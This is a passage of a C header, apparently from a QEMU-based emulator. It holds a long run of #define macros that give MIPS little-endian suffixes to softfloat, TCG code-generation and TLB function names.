float32_log2 float32_log2_mipsel #define float32_eq float32_eq_mipsel #define float32_le float32_le_mipsel #define float32_lt float32_lt_mipsel #define float32_unordered float32_unordered_mipsel #define float32_eq_quiet float32_eq_quiet_mipsel #define float32_le_quiet float32_le_quiet_mipsel #define float32_lt_quiet float32_lt_quiet_mipsel #define float32_unordered_quiet float32_unordered_quiet_mipsel #define float64_to_floatx80 float64_to_floatx80_mipsel #define float64_to_float128 float64_to_float128_mipsel #define float64_rem float64_rem_mipsel #define float64_log2 float64_log2_mipsel #define float64_eq float64_eq_mipsel #define float64_le float64_le_mipsel #define float64_lt float64_lt_mipsel #define float64_unordered float64_unordered_mipsel #define float64_eq_quiet float64_eq_quiet_mipsel #define float64_le_quiet float64_le_quiet_mipsel #define float64_lt_quiet float64_lt_quiet_mipsel #define float64_unordered_quiet float64_unordered_quiet_mipsel #define floatx80_to_int32 floatx80_to_int32_mipsel #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mipsel #define floatx80_to_int64 floatx80_to_int64_mipsel #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mipsel #define floatx80_to_float32 floatx80_to_float32_mipsel #define floatx80_to_float64 floatx80_to_float64_mipsel #define floatx80_to_float128 floatx80_to_float128_mipsel #define floatx80_round floatx80_round_mipsel #define floatx80_round_to_int floatx80_round_to_int_mipsel #define floatx80_add floatx80_add_mipsel #define floatx80_sub floatx80_sub_mipsel #define floatx80_mul floatx80_mul_mipsel #define floatx80_div floatx80_div_mipsel #define floatx80_rem floatx80_rem_mipsel #define floatx80_sqrt floatx80_sqrt_mipsel #define floatx80_eq floatx80_eq_mipsel #define floatx80_le floatx80_le_mipsel #define floatx80_lt floatx80_lt_mipsel #define floatx80_unordered floatx80_unordered_mipsel #define floatx80_eq_quiet floatx80_eq_quiet_mipsel #define floatx80_le_quiet floatx80_le_quiet_mipsel #define floatx80_lt_quiet floatx80_lt_quiet_mipsel #define floatx80_unordered_quiet floatx80_unordered_quiet_mipsel #define float128_to_int32 float128_to_int32_mipsel #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mipsel #define float128_to_int64 float128_to_int64_mipsel #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mipsel #define float128_to_uint64 float128_to_uint64_mipsel #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_mipsel #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_mipsel #define float128_to_uint32 float128_to_uint32_mipsel #define float128_to_float32 float128_to_float32_mipsel #define float128_to_float64 float128_to_float64_mipsel #define float128_to_floatx80 float128_to_floatx80_mipsel #define float128_round_to_int float128_round_to_int_mipsel #define float128_add float128_add_mipsel #define float128_sub float128_sub_mipsel #define float128_mul float128_mul_mipsel #define float128_div float128_div_mipsel #define float128_rem float128_rem_mipsel #define float128_sqrt float128_sqrt_mipsel #define float128_eq float128_eq_mipsel #define float128_le float128_le_mipsel #define float128_lt float128_lt_mipsel #define float128_unordered float128_unordered_mipsel #define float128_eq_quiet float128_eq_quiet_mipsel #define float128_le_quiet float128_le_quiet_mipsel #define float128_lt_quiet float128_lt_quiet_mipsel #define float128_unordered_quiet float128_unordered_quiet_mipsel #define floatx80_compare floatx80_compare_mipsel #define floatx80_compare_quiet floatx80_compare_quiet_mipsel #define float128_compare float128_compare_mipsel #define float128_compare_quiet float128_compare_quiet_mipsel #define floatx80_scalbn floatx80_scalbn_mipsel #define float128_scalbn float128_scalbn_mipsel #define softfloat_init softfloat_init_mipsel #define tcg_optimize tcg_optimize_mipsel #define gen_new_label gen_new_label_mipsel #define tcg_can_emit_vec_op tcg_can_emit_vec_op_mipsel #define tcg_expand_vec_op tcg_expand_vec_op_mipsel #define tcg_register_jit tcg_register_jit_mipsel #define tcg_tb_insert tcg_tb_insert_mipsel #define tcg_tb_remove tcg_tb_remove_mipsel #define tcg_tb_lookup tcg_tb_lookup_mipsel #define tcg_tb_foreach tcg_tb_foreach_mipsel #define tcg_nb_tbs tcg_nb_tbs_mipsel #define tcg_region_reset_all tcg_region_reset_all_mipsel #define tcg_region_init tcg_region_init_mipsel #define tcg_code_size tcg_code_size_mipsel #define tcg_code_capacity tcg_code_capacity_mipsel #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_mipsel #define tcg_malloc_internal tcg_malloc_internal_mipsel #define tcg_pool_reset tcg_pool_reset_mipsel #define tcg_context_init tcg_context_init_mipsel #define tcg_tb_alloc tcg_tb_alloc_mipsel #define tcg_prologue_init tcg_prologue_init_mipsel #define tcg_func_start tcg_func_start_mipsel #define tcg_set_frame tcg_set_frame_mipsel #define tcg_global_mem_new_internal tcg_global_mem_new_internal_mipsel #define tcg_temp_new_internal tcg_temp_new_internal_mipsel #define tcg_temp_new_vec tcg_temp_new_vec_mipsel #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_mipsel #define tcg_temp_free_internal tcg_temp_free_internal_mipsel #define tcg_const_i32 tcg_const_i32_mipsel #define tcg_const_i64 tcg_const_i64_mipsel #define tcg_const_local_i32 tcg_const_local_i32_mipsel #define tcg_const_local_i64 tcg_const_local_i64_mipsel #define tcg_op_supported tcg_op_supported_mipsel #define tcg_gen_callN tcg_gen_callN_mipsel #define tcg_op_remove tcg_op_remove_mipsel #define tcg_emit_op tcg_emit_op_mipsel #define tcg_op_insert_before tcg_op_insert_before_mipsel #define tcg_op_insert_after tcg_op_insert_after_mipsel #define tcg_cpu_exec_time tcg_cpu_exec_time_mipsel #define tcg_gen_code tcg_gen_code_mipsel #define tcg_gen_op1 tcg_gen_op1_mipsel #define tcg_gen_op2 tcg_gen_op2_mipsel #define tcg_gen_op3 tcg_gen_op3_mipsel #define tcg_gen_op4 tcg_gen_op4_mipsel #define tcg_gen_op5 tcg_gen_op5_mipsel #define tcg_gen_op6 tcg_gen_op6_mipsel #define tcg_gen_mb tcg_gen_mb_mipsel #define tcg_gen_addi_i32 tcg_gen_addi_i32_mipsel #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_mipsel #define tcg_gen_subi_i32 tcg_gen_subi_i32_mipsel #define tcg_gen_andi_i32 tcg_gen_andi_i32_mipsel #define tcg_gen_ori_i32 tcg_gen_ori_i32_mipsel #define tcg_gen_xori_i32 tcg_gen_xori_i32_mipsel #define tcg_gen_shli_i32 tcg_gen_shli_i32_mipsel #define tcg_gen_shri_i32 tcg_gen_shri_i32_mipsel #define tcg_gen_sari_i32 tcg_gen_sari_i32_mipsel #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mipsel #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mipsel #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mipsel #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_mipsel #define tcg_gen_muli_i32 tcg_gen_muli_i32_mipsel #define tcg_gen_div_i32 tcg_gen_div_i32_mipsel #define tcg_gen_rem_i32 tcg_gen_rem_i32_mipsel #define tcg_gen_divu_i32 tcg_gen_divu_i32_mipsel #define tcg_gen_remu_i32 tcg_gen_remu_i32_mipsel #define tcg_gen_andc_i32 tcg_gen_andc_i32_mipsel #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_mipsel #define tcg_gen_nand_i32 tcg_gen_nand_i32_mipsel #define tcg_gen_nor_i32 tcg_gen_nor_i32_mipsel #define tcg_gen_orc_i32 tcg_gen_orc_i32_mipsel #define tcg_gen_clz_i32 tcg_gen_clz_i32_mipsel #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_mipsel #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_mipsel #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_mipsel #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_mipsel #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_mipsel #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mipsel #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mipsel #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mipsel #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mipsel #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mipsel #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_mipsel #define tcg_gen_extract_i32 tcg_gen_extract_i32_mipsel #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_mipsel #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_mipsel #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mipsel #define tcg_gen_add2_i32 tcg_gen_add2_i32_mipsel #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_mipsel #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mipsel #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mipsel #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_mipsel #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mipsel #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mipsel #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mipsel #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mipsel #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mipsel #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mipsel #define tcg_gen_smin_i32 tcg_gen_smin_i32_mipsel #define tcg_gen_umin_i32 tcg_gen_umin_i32_mipsel #define tcg_gen_smax_i32 tcg_gen_smax_i32_mipsel #define tcg_gen_umax_i32 tcg_gen_umax_i32_mipsel #define tcg_gen_abs_i32 tcg_gen_abs_i32_mipsel #define tcg_gen_addi_i64 tcg_gen_addi_i64_mipsel #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_mipsel #define tcg_gen_subi_i64 tcg_gen_subi_i64_mipsel #define tcg_gen_andi_i64 tcg_gen_andi_i64_mipsel #define tcg_gen_ori_i64 tcg_gen_ori_i64_mipsel #define tcg_gen_xori_i64 tcg_gen_xori_i64_mipsel #define tcg_gen_shli_i64 tcg_gen_shli_i64_mipsel #define tcg_gen_shri_i64 tcg_gen_shri_i64_mipsel #define tcg_gen_sari_i64 tcg_gen_sari_i64_mipsel #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mipsel #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_mipsel #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_mipsel #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_mipsel #define tcg_gen_muli_i64 tcg_gen_muli_i64_mipsel #define tcg_gen_div_i64 tcg_gen_div_i64_mipsel #define tcg_gen_rem_i64 tcg_gen_rem_i64_mipsel #define tcg_gen_divu_i64 tcg_gen_divu_i64_mipsel #define tcg_gen_remu_i64 tcg_gen_remu_i64_mipsel #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_mipsel #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_mipsel #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mipsel #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_mipsel #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_mipsel #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mipsel #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_mipsel #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_mipsel #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_mipsel #define tcg_gen_not_i64 tcg_gen_not_i64_mipsel #define tcg_gen_andc_i64 tcg_gen_andc_i64_mipsel #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_mipsel #define tcg_gen_nand_i64 tcg_gen_nand_i64_mipsel #define tcg_gen_nor_i64 tcg_gen_nor_i64_mipsel #define tcg_gen_orc_i64 tcg_gen_orc_i64_mipsel #define tcg_gen_clz_i64 tcg_gen_clz_i64_mipsel #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_mipsel #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_mipsel #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_mipsel #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_mipsel #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_mipsel #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_mipsel #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_mipsel #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_mipsel #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_mipsel #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_mipsel #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_mipsel #define tcg_gen_extract_i64 tcg_gen_extract_i64_mipsel #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_mipsel #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_mipsel #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mipsel #define tcg_gen_add2_i64 tcg_gen_add2_i64_mipsel #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_mipsel #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_mipsel #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_mipsel #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_mipsel #define tcg_gen_smin_i64 tcg_gen_smin_i64_mipsel #define tcg_gen_umin_i64 tcg_gen_umin_i64_mipsel #define tcg_gen_smax_i64 tcg_gen_smax_i64_mipsel #define tcg_gen_umax_i64 tcg_gen_umax_i64_mipsel #define tcg_gen_abs_i64 tcg_gen_abs_i64_mipsel #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_mipsel #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_mipsel #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mipsel #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mipsel #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mipsel #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_mipsel #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_mipsel #define tcg_gen_exit_tb tcg_gen_exit_tb_mipsel #define tcg_gen_goto_tb tcg_gen_goto_tb_mipsel #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_mipsel #define check_exit_request check_exit_request_mipsel #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mipsel #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mipsel #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mipsel #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mipsel #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_mipsel #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_mipsel #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_mipsel #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_mipsel #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_mipsel #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_mipsel #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_mipsel #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_mipsel #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_mipsel #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_mipsel #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_mipsel #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_mipsel #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_mipsel #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_mipsel #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_mipsel #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_mipsel #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_mipsel #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_mipsel #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_mipsel #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_mipsel #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_mipsel #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_mipsel #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_mipsel #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_mipsel #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_mipsel #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_mipsel #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_mipsel #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_mipsel #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_mipsel #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_mipsel #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_mipsel #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_mipsel #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_mipsel #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_mipsel #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_mipsel #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_mipsel #define simd_desc simd_desc_mipsel #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_mipsel #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_mipsel #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_mipsel #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_mipsel #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_mipsel #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_mipsel #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_mipsel #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_mipsel #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_mipsel #define tcg_gen_gvec_2 tcg_gen_gvec_2_mipsel #define tcg_gen_gvec_2i tcg_gen_gvec_2i_mipsel #define tcg_gen_gvec_2s tcg_gen_gvec_2s_mipsel #define tcg_gen_gvec_3 tcg_gen_gvec_3_mipsel #define tcg_gen_gvec_3i tcg_gen_gvec_3i_mipsel #define tcg_gen_gvec_4 tcg_gen_gvec_4_mipsel #define tcg_gen_gvec_mov tcg_gen_gvec_mov_mipsel #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_mipsel #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_mipsel #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_mipsel #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_mipsel #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_mipsel #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_mipsel #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_mipsel #define tcg_gen_gvec_not tcg_gen_gvec_not_mipsel #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_mipsel #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_mipsel #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_mipsel #define tcg_gen_gvec_add tcg_gen_gvec_add_mipsel #define tcg_gen_gvec_adds tcg_gen_gvec_adds_mipsel #define tcg_gen_gvec_addi tcg_gen_gvec_addi_mipsel #define tcg_gen_gvec_subs tcg_gen_gvec_subs_mipsel #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_mipsel #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_mipsel #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_mipsel #define tcg_gen_gvec_sub tcg_gen_gvec_sub_mipsel #define tcg_gen_gvec_mul tcg_gen_gvec_mul_mipsel #define tcg_gen_gvec_muls tcg_gen_gvec_muls_mipsel #define tcg_gen_gvec_muli tcg_gen_gvec_muli_mipsel #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_mipsel #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_mipsel #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_mipsel #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_mipsel #define tcg_gen_gvec_smin tcg_gen_gvec_smin_mipsel #define tcg_gen_gvec_umin tcg_gen_gvec_umin_mipsel #define tcg_gen_gvec_smax tcg_gen_gvec_smax_mipsel #define tcg_gen_gvec_umax tcg_gen_gvec_umax_mipsel #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_mipsel #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_mipsel #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_mipsel #define tcg_gen_gvec_neg tcg_gen_gvec_neg_mipsel #define tcg_gen_gvec_abs tcg_gen_gvec_abs_mipsel #define tcg_gen_gvec_and tcg_gen_gvec_and_mipsel #define tcg_gen_gvec_or tcg_gen_gvec_or_mipsel #define tcg_gen_gvec_xor tcg_gen_gvec_xor_mipsel #define tcg_gen_gvec_andc tcg_gen_gvec_andc_mipsel #define tcg_gen_gvec_orc tcg_gen_gvec_orc_mipsel #define tcg_gen_gvec_nand tcg_gen_gvec_nand_mipsel #define tcg_gen_gvec_nor tcg_gen_gvec_nor_mipsel #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_mipsel #define tcg_gen_gvec_ands tcg_gen_gvec_ands_mipsel #define tcg_gen_gvec_andi tcg_gen_gvec_andi_mipsel #define tcg_gen_gvec_xors tcg_gen_gvec_xors_mipsel #define tcg_gen_gvec_xori tcg_gen_gvec_xori_mipsel #define tcg_gen_gvec_ors tcg_gen_gvec_ors_mipsel #define tcg_gen_gvec_ori tcg_gen_gvec_ori_mipsel #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_mipsel #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_mipsel #define tcg_gen_gvec_shli tcg_gen_gvec_shli_mipsel #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_mipsel #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_mipsel #define tcg_gen_gvec_shri tcg_gen_gvec_shri_mipsel #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_mipsel #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_mipsel #define tcg_gen_gvec_sari tcg_gen_gvec_sari_mipsel #define tcg_gen_gvec_shls tcg_gen_gvec_shls_mipsel #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_mipsel #define tcg_gen_gvec_sars tcg_gen_gvec_sars_mipsel #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_mipsel #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_mipsel #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_mipsel #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_mipsel #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_mipsel #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_mipsel #define vec_gen_2 vec_gen_2_mipsel #define vec_gen_3 vec_gen_3_mipsel #define vec_gen_4 vec_gen_4_mipsel #define tcg_gen_mov_vec tcg_gen_mov_vec_mipsel #define tcg_const_zeros_vec tcg_const_zeros_vec_mipsel #define tcg_const_ones_vec tcg_const_ones_vec_mipsel #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_mipsel #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_mipsel #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_mipsel #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_mipsel #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_mipsel #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_mipsel #define tcg_gen_dupi_vec tcg_gen_dupi_vec_mipsel #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_mipsel #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_mipsel #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_mipsel #define tcg_gen_ld_vec tcg_gen_ld_vec_mipsel #define tcg_gen_st_vec tcg_gen_st_vec_mipsel #define tcg_gen_stl_vec tcg_gen_stl_vec_mipsel #define tcg_gen_and_vec tcg_gen_and_vec_mipsel #define tcg_gen_or_vec tcg_gen_or_vec_mipsel #define tcg_gen_xor_vec tcg_gen_xor_vec_mipsel #define tcg_gen_andc_vec tcg_gen_andc_vec_mipsel #define tcg_gen_orc_vec tcg_gen_orc_vec_mipsel #define tcg_gen_nand_vec tcg_gen_nand_vec_mipsel #define tcg_gen_nor_vec tcg_gen_nor_vec_mipsel #define tcg_gen_eqv_vec tcg_gen_eqv_vec_mipsel #define tcg_gen_not_vec tcg_gen_not_vec_mipsel #define tcg_gen_neg_vec tcg_gen_neg_vec_mipsel #define tcg_gen_abs_vec tcg_gen_abs_vec_mipsel #define tcg_gen_shli_vec tcg_gen_shli_vec_mipsel #define tcg_gen_shri_vec tcg_gen_shri_vec_mipsel #define tcg_gen_sari_vec tcg_gen_sari_vec_mipsel #define tcg_gen_cmp_vec tcg_gen_cmp_vec_mipsel #define tcg_gen_add_vec tcg_gen_add_vec_mipsel #define tcg_gen_sub_vec tcg_gen_sub_vec_mipsel #define tcg_gen_mul_vec tcg_gen_mul_vec_mipsel #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_mipsel #define tcg_gen_usadd_vec tcg_gen_usadd_vec_mipsel #define tcg_gen_sssub_vec tcg_gen_sssub_vec_mipsel #define tcg_gen_ussub_vec tcg_gen_ussub_vec_mipsel #define tcg_gen_smin_vec tcg_gen_smin_vec_mipsel #define tcg_gen_umin_vec tcg_gen_umin_vec_mipsel #define tcg_gen_smax_vec tcg_gen_smax_vec_mipsel #define tcg_gen_umax_vec tcg_gen_umax_vec_mipsel #define tcg_gen_shlv_vec tcg_gen_shlv_vec_mipsel #define tcg_gen_shrv_vec tcg_gen_shrv_vec_mipsel #define tcg_gen_sarv_vec tcg_gen_sarv_vec_mipsel #define tcg_gen_shls_vec tcg_gen_shls_vec_mipsel #define tcg_gen_shrs_vec tcg_gen_shrs_vec_mipsel #define tcg_gen_sars_vec tcg_gen_sars_vec_mipsel #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_mipsel #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_mipsel #define tb_htable_lookup tb_htable_lookup_mipsel #define tb_set_jmp_target tb_set_jmp_target_mipsel #define cpu_exec cpu_exec_mipsel #define cpu_loop_exit_noexc cpu_loop_exit_noexc_mipsel #define cpu_reloading_memory_map cpu_reloading_memory_map_mipsel #define cpu_loop_exit cpu_loop_exit_mipsel #define cpu_loop_exit_restore cpu_loop_exit_restore_mipsel #define cpu_loop_exit_atomic cpu_loop_exit_atomic_mipsel #define tlb_init tlb_init_mipsel #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_mipsel #define tlb_flush tlb_flush_mipsel #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_mipsel #define tlb_flush_all_cpus tlb_flush_all_cpus_mipsel #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_mipsel #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_mipsel #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_mipsel #define tlb_flush_page tlb_flush_page_mipsel #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_mipsel #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_mipsel #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_mipsel #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_mipsel #define tlb_protect_code tlb_protect_code_mipsel #define tlb_unprotect_code tlb_unprotect_code_mipsel #define tlb_reset_dirty tlb_reset_dirty_mipsel #define tlb_set_dirty tlb_set_dirty_mipsel #define tlb_set_page_with_attrs tlb_set_page_with_attrs_mipsel #define tlb_set_page tlb_set_page_mipsel #define get_page_addr_code_hostp get_page_addr_code_hostp_mipsel #define get_page_addr_code get_page_addr_code_mipsel #define probe_access probe_access_mipsel #define tlb_vaddr_to_host tlb_vaddr_to_host_mipsel #define helper_ret_ldub_mmu helper_ret_ldub_mmu_mipsel #define helper_le_lduw_mmu helper_le_lduw_mmu_mipsel #define helper_be_lduw_mmu helper_be_lduw_mmu_mipsel #define helper_le_ldul_mmu helper_le_ldul_mmu_mipsel #define helper_be_ldul_mmu helper_be_ldul_mmu_mipsel #define helper_le_ldq_mmu helper_le_ldq_mmu_mipsel #define helper_be_ldq_mmu helper_be_ldq_mmu_mipsel #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mipsel #define helper_le_ldsw_mmu helper_le_ldsw_mmu_mipsel #define helper_be_ldsw_mmu helper_be_ldsw_mmu_mipsel #define helper_le_ldsl_mmu 